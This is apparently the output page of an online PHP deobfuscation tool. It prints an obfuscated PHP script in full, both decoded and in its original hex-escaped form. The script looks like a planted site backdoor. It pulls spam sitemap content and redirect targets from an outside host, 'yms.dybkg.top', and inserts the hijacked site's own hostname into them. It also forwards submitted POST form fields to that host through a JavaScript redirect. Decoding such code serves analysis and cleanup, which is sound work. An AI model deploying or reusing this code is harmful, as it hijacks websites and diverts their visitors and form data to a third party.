Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto f8uRm; PZytr: if (is_null($_GET["\163"])) { goto Ko2bq; } goto giTj7; W78yV: ..

Decoded Output download

<?php 
 goto f8uRm; PZytr: if (is_null($_GET["s"])) { goto Ko2bq; } goto giTj7; W78yV: $f2hc1 = str_replace("ggggg", $peh1y, $f2hc1); goto CtKid; gpu3T: $f2hc1 = str_replace("cname=", "lieby=", $f2hc1); goto N_4F3; Uqm_p: $f2hc1 = str_replace("yymm", $nQk4t . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"], $f2hc1); goto ucDPR; g6o2W: $f2hc1 = str_replace("KKKKK", $Qc2xW, $f2hc1); goto TR1uI; eebKR: goto HCZWg; goto QcAPt; QqRMJ: if (!($_SERVER["REQUEST_METHOD"] == "POST")) { goto UkJM2; } goto XxnpF; Wp7Es: $kL7Dz = str_replace("{1}", base64_encode($_POST["pid"]), $kL7Dz); goto qmC5A; TKUhz: $f2hc1 = str_replace("UUUUU", $nQk4t . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"], $f2hc1); goto JoA2g; zTq6o: exit; goto gPJK8; CG5DG: $peh1y = $_GET["g"]; goto H90OJ; nqAVc: $f2hc1 = str_replace("IIIII", $nQk4t . $_SERVER["HTTP_HOST"], $f2hc1); goto TKUhz; gPJK8: Ko2bq: goto zP93g; H90OJ: SOLuI: goto QqRMJ; QcAPt: wtAG8: goto NWuJS; r5b11: $kL7Dz = str_replace("{4}", base64_encode($_POST["pfh"]), $kL7Dz); goto zy16z; Xjn_4: goto SOLuI; goto HVEhy; HVEhy: Q5bLN: goto PpEDM; TB_6D: $kL7Dz = str_replace("{6}", base64_encode($_POST["st"]), $kL7Dz); goto ikRiT; QBuIW: exit; goto dXifp; Lv_QM: $QI9v7 = $QI9v7 . "?number=" . $_GET["number"] . "&pnum=" . $_GET["pnum"] . "&cid=" . $_GET["cid"]; goto IM1w8; hukYI: echo $f2hc1; goto QBuIW; XxnpF: $kL7Dz = $VA5U1 . "c.aspx?pid={1}&pname={2}&price={3}&pfh={4}&pimg={5}&st={6}&sv={7}&cid={8}&la={9}&qsl={10}"; goto Wp7Es; vrO9t: goto bgQCP; goto wqiFg; Dx082: $kL7Dz = str_replace("{10}", base64_encode($_POST["qsl"]), $kL7Dz); goto hRcRA; nSIVq: $f2hc1 = str_replace("iid=", "xqy=spc", $f2hc1); goto J3ZEq; Kuzuz: $peh1y = file_get_contents($MdzPC . "1.aspx?jd=" . $VA5U1); goto Xjn_4; MTy5H: $f2hc1 = str_replace("ggggg", $peh1y, $f2hc1); goto nPA3x; y1SbM: $f2hc1 = str_replace("TTTTT", "Off " . mt_rand(50, 70) . "% - " . $_SERVER["HTTP_HOST"], $f2hc1); goto g6o2W; dXifp: BhZh4: goto PZytr; ucDPR: if (!($nQk4t == "https://")) { goto T9B9y; } goto WJHhR; siwzD: exit; goto KmjTZ; zP93g: if (!is_null($_GET["xqy"])) { goto x13nG; } goto NCR0t; BIU3Z: Hq7US: goto Lv_QM; WJHhR: $f2hc1 = str_replace("?g=", "?g=1", $f2hc1); goto cNVsq; PpEDM: $VA5U1 = file_get_contents($MdzPC . "1.aspx?sz=" . $_GET["g"]); goto CG5DG; ozZ46: $QI9v7 = $VA5U1 . "slm.aspx"; goto mLV3y; zy16z: $kL7Dz = str_replace("{5}", base64_encode($_POST["pimg"]), $kL7Dz); goto TB_6D; h2cjm: O8sO1: goto eebKR; w5DBd: if (!is_null($_GET["g"])) { goto Q5bLN; } goto As_8r; PlRrK: $MdzPC = $nQk4t . "yms.dybkg.top/"; goto w5DBd; CoqRt: $uvi99 = $VA5U1 . "lm.aspx?iid=" . urlencode(str_replace("spc", '', $_GET["xqy"])); goto rPkdM; NCR0t: if (!is_null($_GET["lieby"]) && !is_null($_GET["cid"])) { goto wtAG8; } goto Qv8ae; oHOpg: $Qc2xW = file_get_contents($VA5U1 . "getci.aspx?cid=" . $_GET["cid"] . "&s=2&e=4"); goto uuzdS; T5kYG: $kL7Dz = str_replace("{9}", base64_encode($_POST["la"]), $kL7Dz); goto Dx082; QyfIH: $kL7Dz = str_replace("{8}", base64_encode($_POST["cid"]), $kL7Dz); goto T5kYG; Li1eD: $f2hc1 = str_replace("yymm", $nQk4t . $_SERVER["HTTP_HOST"] . $_SERVER["SCRIPT_NAME"], $f2hc1); goto MTy5H; giTj7: $f2hc1 = file_get_contents($nQk4t . "yms.dybkg.top/shx.aspx"); goto Uqm_p; wqiFg: x13nG: goto CoqRt; JoA2g: $f2hc1 = str_replace("iid=", "xqy=spc", $f2hc1); goto gpu3T; f8uRm: error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); goto XgHSt; J3ZEq: header("Content-type:text/xml"); goto hukYI; qmC5A: $kL7Dz = str_replace("{2}", base64_encode($_POST["pname"]), $kL7Dz); goto UMM1W; TR1uI: $f2hc1 = str_replace("DDDDD", $DELSM . ".", $f2hc1); goto n30yP; IM1w8: $f2hc1 = file_get_contents($QI9v7); goto Li1eD; zQehC: HCZWg: goto vrO9t; N_4F3: $f2hc1 = str_replace("YMYMYM", $_SERVER["HTTP_HOST"], $f2hc1); goto y1SbM; Hqs2N: $uvi99 = $VA5U1 . "lm.aspx?pp=" . $_GET["pp"]; goto h2cjm; UMM1W: $kL7Dz = str_replace("{3}", base64_encode($_POST["price"]), $kL7Dz); goto r5b11; Qv8ae: if (is_null($_GET["pp"])) { goto O8sO1; } goto Hqs2N; CtKid: $f2hc1 = str_replace("NNNNN", $VA5U1, $f2hc1); goto nqAVc; thcSR: $f2hc1 = file_get_contents($uvi99); goto W78yV; tfFQ3: echo $f2hc1; goto zTq6o; GS0s9: header("Content-type:text/xml"); goto tfFQ3; rPkdM: bgQCP: goto thcSR; KmjTZ: UkJM2: goto oHOpg; nPA3x: $f2hc1 = str_replace("cname=", "lieby=", $f2hc1); goto nSIVq; ikRiT: $kL7Dz = str_replace("{7}", base64_encode($_POST["sv"]), $kL7Dz); goto QyfIH; uuzdS: $DELSM = file_get_contents($VA5U1 . "getci.aspx?cid=" . $_GET["cid"] . "&s=5&e=7"); goto fz4f0; cNVsq: T9B9y: goto GS0s9; NK_AR: $QI9v7 = $VA5U1 . "spd.aspx"; goto BIU3Z; hRcRA: echo "<script>document.location="" . $kL7Dz . ""</script>"; goto siwzD; XgHSt: $nQk4t = isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on" || isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https" ? "https://" : "http://"; goto PlRrK; fz4f0: if (is_null($_GET["number"])) { goto BhZh4; } goto ozZ46; As_8r: $VA5U1 = file_get_contents($MdzPC . "1.aspx?xy=" . $nQk4t); goto Kuzuz; NWuJS: $uvi99 = $VA5U1 . "lm.aspx?cid=" . urlencode($_GET["cid"]) . "&cname=" . urlencode($_GET["lieby"]); goto zQehC; mLV3y: if (is_null($_GET["type"])) { goto Hq7US; } goto NK_AR; n30yP: echo $f2hc1; ?>

Did this file decode correctly?

Original Code

<?php
 goto f8uRm; PZytr: if (is_null($_GET["\163"])) { goto Ko2bq; } goto giTj7; W78yV: $f2hc1 = str_replace("\x67\x67\147\x67\x67", $peh1y, $f2hc1); goto CtKid; gpu3T: $f2hc1 = str_replace("\x63\x6e\x61\x6d\145\x3d", "\154\x69\x65\142\171\x3d", $f2hc1); goto N_4F3; Uqm_p: $f2hc1 = str_replace("\171\x79\155\155", $nQk4t . $_SERVER["\110\124\x54\x50\x5f\x48\x4f\x53\124"] . $_SERVER["\x53\x43\x52\x49\120\124\x5f\116\x41\x4d\105"], $f2hc1); goto ucDPR; g6o2W: $f2hc1 = str_replace("\113\113\x4b\113\x4b", $Qc2xW, $f2hc1); goto TR1uI; eebKR: goto HCZWg; goto QcAPt; QqRMJ: if (!($_SERVER["\122\x45\121\x55\x45\123\124\137\115\105\124\x48\x4f\x44"] == "\x50\x4f\x53\x54")) { goto UkJM2; } goto XxnpF; Wp7Es: $kL7Dz = str_replace("\173\61\x7d", base64_encode($_POST["\160\151\x64"]), $kL7Dz); goto qmC5A; TKUhz: $f2hc1 = str_replace("\x55\125\125\x55\x55", $nQk4t . $_SERVER["\x48\x54\124\x50\x5f\110\117\x53\x54"] . $_SERVER["\x53\103\122\x49\x50\124\x5f\116\x41\115\105"], $f2hc1); goto JoA2g; zTq6o: exit; goto gPJK8; CG5DG: $peh1y = $_GET["\x67"]; goto H90OJ; nqAVc: $f2hc1 = str_replace("\x49\111\x49\x49\111", $nQk4t . $_SERVER["\x48\124\124\120\x5f\110\x4f\123\x54"], $f2hc1); goto TKUhz; gPJK8: Ko2bq: goto zP93g; H90OJ: SOLuI: goto QqRMJ; QcAPt: wtAG8: goto NWuJS; r5b11: $kL7Dz = str_replace("\x7b\64\x7d", base64_encode($_POST["\x70\146\x68"]), $kL7Dz); goto zy16z; Xjn_4: goto SOLuI; goto HVEhy; HVEhy: Q5bLN: goto PpEDM; TB_6D: $kL7Dz = str_replace("\173\66\175", base64_encode($_POST["\x73\164"]), $kL7Dz); goto ikRiT; QBuIW: exit; goto dXifp; Lv_QM: $QI9v7 = $QI9v7 . "\77\156\x75\x6d\x62\x65\x72\75" . $_GET["\x6e\x75\155\142\145\x72"] . "\x26\160\156\165\155\75" . $_GET["\160\156\165\155"] . "\46\x63\151\x64\x3d" . $_GET["\x63\x69\x64"]; goto IM1w8; hukYI: echo $f2hc1; goto QBuIW; XxnpF: $kL7Dz = $VA5U1 . "\143\56\141\163\x70\x78\77\x70\x69\144\x3d\173\x31\x7d\x26\x70\156\141\x6d\x65\x3d\173\x32\175\46\x70\162\151\143\x65\75\173\x33\175\x26\160\146\150\x3d\x7b\x34\175\46\160\151\x6d\147\75\x7b\x35\x7d\46\x73\x74\75\x7b\66\x7d\46\x73\166\75\173\67\x7d\46\x63\x69\144\75\173\70\175\x26\154\x61\75\173\71\x7d\46\161\x73\154\75\x7b\x31\x30\175"; goto Wp7Es; vrO9t: goto bgQCP; goto wqiFg; Dx082: $kL7Dz = str_replace("\x7b\61\x30\175", base64_encode($_POST["\x71\x73\x6c"]), $kL7Dz); goto hRcRA; nSIVq: $f2hc1 = str_replace("\151\x69\x64\75", "\170\x71\x79\x3d\x73\160\x63", $f2hc1); goto J3ZEq; Kuzuz: $peh1y = file_get_contents($MdzPC . "\61\x2e\x61\x73\160\170\77\x6a\144\x3d" . $VA5U1); goto Xjn_4; MTy5H: $f2hc1 = str_replace("\x67\x67\x67\147\147", $peh1y, $f2hc1); goto nPA3x; y1SbM: $f2hc1 = str_replace("\x54\124\124\x54\x54", "\117\x66\x66\x20" . mt_rand(50, 70) . "\45\40\55\40" . $_SERVER["\x48\x54\x54\x50\137\x48\117\123\124"], $f2hc1); goto g6o2W; dXifp: BhZh4: goto PZytr; ucDPR: if (!($nQk4t == "\x68\164\164\x70\163\72\57\57")) { goto T9B9y; } goto WJHhR; siwzD: exit; goto KmjTZ; zP93g: if (!is_null($_GET["\x78\161\x79"])) { goto x13nG; } goto NCR0t; BIU3Z: Hq7US: goto Lv_QM; WJHhR: $f2hc1 = str_replace("\77\x67\75", "\x3f\x67\x3d\61", $f2hc1); goto cNVsq; PpEDM: $VA5U1 = file_get_contents($MdzPC . "\61\x2e\141\163\x70\170\77\x73\172\x3d" . $_GET["\147"]); goto CG5DG; ozZ46: $QI9v7 = $VA5U1 . "\x73\x6c\155\56\141\163\160\x78"; goto mLV3y; zy16z: $kL7Dz = str_replace("\x7b\65\175", base64_encode($_POST["\x70\151\155\x67"]), $kL7Dz); goto TB_6D; h2cjm: O8sO1: goto eebKR; w5DBd: if (!is_null($_GET["\x67"])) { goto Q5bLN; } goto As_8r; PlRrK: $MdzPC = $nQk4t . "\171\155\163\x2e\x64\171\x62\153\147\x2e\x74\157\160\57"; goto w5DBd; CoqRt: $uvi99 = $VA5U1 . "\154\155\x2e\141\163\160\170\77\151\151\144\75" . urlencode(str_replace("\x73\x70\x63", '', $_GET["\170\161\171"])); goto rPkdM; NCR0t: if (!is_null($_GET["\154\x69\x65\142\x79"]) && !is_null($_GET["\143\151\144"])) { goto wtAG8; } goto Qv8ae; oHOpg: $Qc2xW = file_get_contents($VA5U1 . "\147\145\164\x63\x69\x2e\x61\x73\x70\x78\x3f\143\x69\x64\75" . $_GET["\x63\151\x64"] . "\46\163\75\62\46\x65\x3d\64"); goto uuzdS; T5kYG: $kL7Dz = str_replace("\173\71\x7d", base64_encode($_POST["\154\x61"]), $kL7Dz); goto Dx082; QyfIH: $kL7Dz = str_replace("\173\x38\x7d", base64_encode($_POST["\x63\x69\x64"]), $kL7Dz); goto T5kYG; Li1eD: $f2hc1 = str_replace("\171\171\155\155", $nQk4t . $_SERVER["\x48\124\x54\120\x5f\110\117\x53\124"] . $_SERVER["\123\x43\x52\111\x50\x54\x5f\x4e\x41\115\x45"], $f2hc1); goto MTy5H; giTj7: $f2hc1 = file_get_contents($nQk4t . "\x79\155\163\56\144\x79\x62\153\147\56\x74\x6f\160\x2f\x73\150\x78\56\x61\163\x70\x78"); goto Uqm_p; wqiFg: x13nG: goto CoqRt; JoA2g: $f2hc1 = str_replace("\x69\151\144\x3d", "\x78\161\x79\75\163\160\x63", $f2hc1); goto gpu3T; f8uRm: error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); goto XgHSt; J3ZEq: header("\103\x6f\156\x74\x65\x6e\x74\x2d\164\x79\x70\145\72\x74\x65\170\x74\x2f\170\x6d\x6c"); goto hukYI; qmC5A: $kL7Dz = str_replace("\173\x32\x7d", base64_encode($_POST["\160\156\141\155\145"]), $kL7Dz); goto UMM1W; TR1uI: $f2hc1 = str_replace("\x44\104\104\x44\104", $DELSM . "\x2e", $f2hc1); goto n30yP; IM1w8: $f2hc1 = file_get_contents($QI9v7); goto Li1eD; zQehC: HCZWg: goto vrO9t; N_4F3: $f2hc1 = str_replace("\x59\115\131\x4d\x59\115", $_SERVER["\x48\x54\x54\120\137\x48\x4f\x53\124"], $f2hc1); goto y1SbM; Hqs2N: $uvi99 = $VA5U1 . "\x6c\155\56\141\163\160\170\x3f\x70\x70\x3d" . $_GET["\160\160"]; goto h2cjm; UMM1W: $kL7Dz = str_replace("\173\x33\175", base64_encode($_POST["\x70\x72\151\143\x65"]), $kL7Dz); goto r5b11; Qv8ae: if (is_null($_GET["\160\160"])) { goto O8sO1; } goto Hqs2N; CtKid: $f2hc1 = str_replace("\x4e\x4e\x4e\x4e\x4e", $VA5U1, $f2hc1); goto nqAVc; thcSR: $f2hc1 = file_get_contents($uvi99); goto W78yV; tfFQ3: echo $f2hc1; goto zTq6o; GS0s9: header("\103\x6f\x6e\x74\145\156\x74\55\x74\171\160\x65\72\x74\x65\170\164\57\x78\155\154"); goto tfFQ3; rPkdM: bgQCP: goto thcSR; KmjTZ: UkJM2: goto oHOpg; nPA3x: $f2hc1 = str_replace("\x63\x6e\141\x6d\145\75", "\154\x69\x65\x62\171\75", $f2hc1); goto nSIVq; ikRiT: $kL7Dz = str_replace("\173\67\175", base64_encode($_POST["\163\166"]), $kL7Dz); goto QyfIH; uuzdS: $DELSM = file_get_contents($VA5U1 . "\x67\145\x74\x63\151\x2e\141\163\x70\x78\77\143\x69\x64\75" . $_GET["\143\x69\144"] . "\46\x73\x3d\x35\46\x65\x3d\67"); goto fz4f0; cNVsq: T9B9y: goto GS0s9; NK_AR: $QI9v7 = $VA5U1 . "\x73\160\x64\56\x61\x73\160\x78"; goto BIU3Z; hRcRA: echo "\x3c\x73\x63\162\151\x70\164\x3e\x64\157\x63\x75\x6d\x65\156\164\56\x6c\157\x63\141\164\x69\157\156\75\x22" . $kL7Dz . "\x22\74\x2f\163\x63\162\151\x70\x74\76"; goto siwzD; XgHSt: $nQk4t = isset($_SERVER["\110\x54\124\120\123"]) && $_SERVER["\110\124\x54\x50\x53"] == "\x6f\x6e" || isset($_SERVER["\110\x54\124\120\x5f\130\137\x46\x4f\x52\127\x41\x52\x44\x45\x44\137\120\x52\117\124\x4f"]) && $_SERVER["\110\124\x54\120\137\x58\137\x46\x4f\122\127\x41\x52\104\x45\104\x5f\x50\122\117\124\x4f"] == "\150\164\164\160\163" ? "\x68\164\x74\160\163\x3a\x2f\57" : "\150\164\x74\160\72\57\57"; goto PlRrK; fz4f0: if (is_null($_GET["\156\165\155\142\145\x72"])) { goto BhZh4; } goto ozZ46; As_8r: $VA5U1 = file_get_contents($MdzPC . "\61\56\x61\x73\x70\170\77\x78\171\75" . $nQk4t); goto Kuzuz; NWuJS: $uvi99 = $VA5U1 . "\154\x6d\x2e\141\163\x70\x78\x3f\143\151\x64\75" . urlencode($_GET["\x63\x69\144"]) . "\x26\x63\156\x61\x6d\145\75" . urlencode($_GET["\154\x69\145\x62\171"]); goto zQehC; mLV3y: if (is_null($_GET["\x74\171\x70\145"])) { goto Hq7US; } goto NK_AR; n30yP: echo $f2hc1;

Function Calls

None

Variables

None

Stats

MD5 637b0dae4d1ca8fbba13c37b3e01382c
Eval Count 0
Decode Time 55 ms